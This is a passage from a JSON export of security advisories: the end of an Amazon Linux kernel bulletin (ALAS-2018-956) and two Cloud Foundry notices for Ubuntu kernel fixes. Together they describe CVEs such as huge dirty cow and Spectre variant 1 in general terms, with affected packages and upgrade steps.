reading dmesg data from an SBS HC printk call.([CVE-2018-5750 __](<https://access.redhat.com/security/cve/CVE-2018-5750>))\n\nImproper sorting of GIDs in nfsd can lead to incorrect permissions being applied \nLinux kernel contains a Incorrect Access Control vulnerability in NFS server (nfsd) that can result in remote users reading or writing files they should not be able to via NFS. This attack appear to be exploitable via NFS server must export a filesystem with the \"rootsquash\" options enabled. 
This vulnerability appears to have been fixed in after commit 1995266727fa.([CVE-2018-1000028 __](<https://access.redhat.com/security/cve/CVE-2018-1000028>))\n\nStack-based out-of-bounds read via vmcall instruction \nLinux kernel compiled with the KVM virtualization (CONFIG_KVM) support is vulnerable to an out-of-bounds read access issue. It could occur when emulating vmcall instructions invoked by a guest. A guest user/process could use this flaw to disclose kernel memory bytes.([CVE-2017-17741 __](<https://access.redhat.com/security/cve/CVE-2017-17741>))\n\nThe pmd can become dirty without going through a COW cycle \nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nSpeculative execution bounds-check bypass \nAn industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant [CVE-2017-5753 __](<https://access.redhat.com/security/cve/CVE-2017-5753>) triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). 
As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks.([CVE-2017-5753 __](<https://access.redhat.com/security/cve/CVE-2017-5753>))\n\ndrivers/block/loop.c mishandles lo_release serialization allowing denial-of-service \nA flaw was found in the Linux kernel's handling of loopback devices. An attacker, who has permissions to setup loopback disks, may create a denial of service or other unspecified actions. ([CVE-2018-5344 __](<https://access.redhat.com/security/cve/CVE-2018-5344>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-debuginfo-4.9.81-35.56.amzn1.i686 \n kernel-devel-4.9.81-35.56.amzn1.i686 \n kernel-headers-4.9.81-35.56.amzn1.i686 \n kernel-debuginfo-4.9.81-35.56.amzn1.i686 \n kernel-4.9.81-35.56.amzn1.i686 \n kernel-tools-4.9.81-35.56.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.81-35.56.amzn1.i686 \n kernel-tools-devel-4.9.81-35.56.amzn1.i686 \n perf-4.9.81-35.56.amzn1.i686 \n perf-debuginfo-4.9.81-35.56.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.81-35.56.amzn1.noarch \n \n src: \n kernel-4.9.81-35.56.amzn1.src \n \n x86_64: \n kernel-4.9.81-35.56.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.81-35.56.amzn1.x86_64 \n kernel-devel-4.9.81-35.56.amzn1.x86_64 \n kernel-tools-devel-4.9.81-35.56.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.81-35.56.amzn1.x86_64 \n perf-4.9.81-35.56.amzn1.x86_64 \n kernel-headers-4.9.81-35.56.amzn1.x86_64 \n kernel-debuginfo-4.9.81-35.56.amzn1.x86_64 \n kernel-tools-4.9.81-35.56.amzn1.x86_64 \n perf-debuginfo-4.9.81-35.56.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2018-02-20T21:20:00", "published": "2018-02-20T21:20:00", "id": "ALAS-2018-956", "href": "https://alas.aws.amazon.com/ALAS-2018-956.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, 
"vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:45", "bulletinFamily": "software", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "# \n\n# Severity\n\nUnspecified\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3509-2 fixed vulnerabilities in the Linux Hardware Enablement kernel for Ubuntu 14.04 LTS. Unfortunately, it also introduced a regression that prevented the Ceph network filesystem from being used. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. 
(CVE-2017-16643)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is unspecified unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.49\n * 3363.x versions prior to 3363.45\n * 3421.x versions prior to 3421.35\n * 3445.x versions prior to 3445.21\n * 3468.x versions prior to 3468.16\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3312.x versions to 3312.49\n * Upgrade 3363.x versions to 3363.45\n * Upgrade 3421.x versions to 3421.35\n * Upgrade 3445.x versions to 3445.21\n * Upgrade 3468.x versions to 3468.16\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n\n# References\n\n * [USN-3509-4](<https://usn.ubuntu.com/3509-4>)\n", "edition": 2, "modified": "2017-12-16T00:00:00", "published": "2017-12-16T00:00:00", "id": "CFOUNDRY:74EC63FE794662FC4DFD36709B39475A", "href": "https://www.cloudfoundry.org/blog/usn-3509-4/", "title": "USN-3509-4: Linux kernel (Xenial HWE) regression | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:38", "bulletinFamily": "software", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. 
A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-16939](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16939>))\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. ([CVE-2017-1000405](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000405>)) Please note: this CVE is also known colloquially as \u201chuge dirty cow\u201d.\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-12193](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12193>))\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. 
([CVE-2017-16643](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16643>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3421.x versions prior to 3421.34\n * 3445.x versions prior to 3445.19\n * 3468.x versions prior to 3468.13\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3421.x versions prior to 3421.34\n * Upgrade 3445.x versions prior to 3445.19\n * Upgrade 3468.x versions prior to 3468.13\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3509-2](<http://www.ubuntu.com/usn/usn-3509-2/>)\n * [CVE-2017-16939](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16939>)\n * [CVE-2017-1000405](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000405>)\n * [CVE-2017-12193](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12193>)\n * [CVE-2017-16643](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16643>)\n", "edition": 5, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "CFOUNDRY:0BD4290D520A235B05B93F0ACF4B7C2B", "href": "https://www.cloudfoundry.org/blog/usn-3509-2/", "title": "USN-3509-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}